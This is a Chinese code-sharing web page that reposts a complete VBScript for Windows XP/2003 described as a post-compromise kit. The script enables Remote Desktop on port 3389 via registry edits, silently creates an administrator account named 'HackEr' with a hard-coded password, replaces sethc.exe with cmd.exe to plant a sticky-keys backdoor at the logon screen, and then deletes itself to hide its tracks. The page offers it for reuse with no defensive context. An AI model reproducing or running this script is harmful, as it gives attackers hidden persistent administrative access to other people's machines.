首页脚本xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

时间2024-02-11 09:57:03发布访客分类脚本浏览600
导读:收集整理的这篇文章主要介绍了xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs,觉得挺不错的,现在分享给大家,也给大家做个参考。 复制代码 代码如下:on ...
收集整理的这篇文章主要介绍了xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs,觉得挺不错的,现在分享给大家,也给大家做个参考。

复制代码 代码如下:
on error resume next 
const HKEY_LOCAL_MACHINE = & H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{ imPErsonationLevel=impersonate} !\\" & _  
strComputer &  "\root\default:StdRegPRov") 
strKeyPath = "SysTEM\currentControlSet\Control\Terminal Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-tcp" 
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" 
strValueName = "fDenyTSConnections" 
dwValue = 0 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" 
strValueName = "PortNumber" 
dwValue = 3389 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 
strValueName = "PortNumber" 
dwValue = 3389 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
on error resume next 
dim username,password:If Wscript.arguments.Count  Then:username=Wscript.arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"& wsnetwork.COMputerName:Set ob=GetObject(os):Set oe=GetObject(os& "/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os& "/"& username& ",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath 
On Error Resume Next 
Dim obj, success 
Set obj = CreateObject("WScript.Shell") 
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe& echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F& copy;  %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe& copy;  %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe& del %SystemRoot%\system32\sethc.exe& ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!


若转载请注明出处: xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
本文地址: https://pptw.com/jishu/609648.html
vbscript sendkeys实例代码大全 用vbs检查注册表项的访问权限的代码

游客 回复需填写必要信息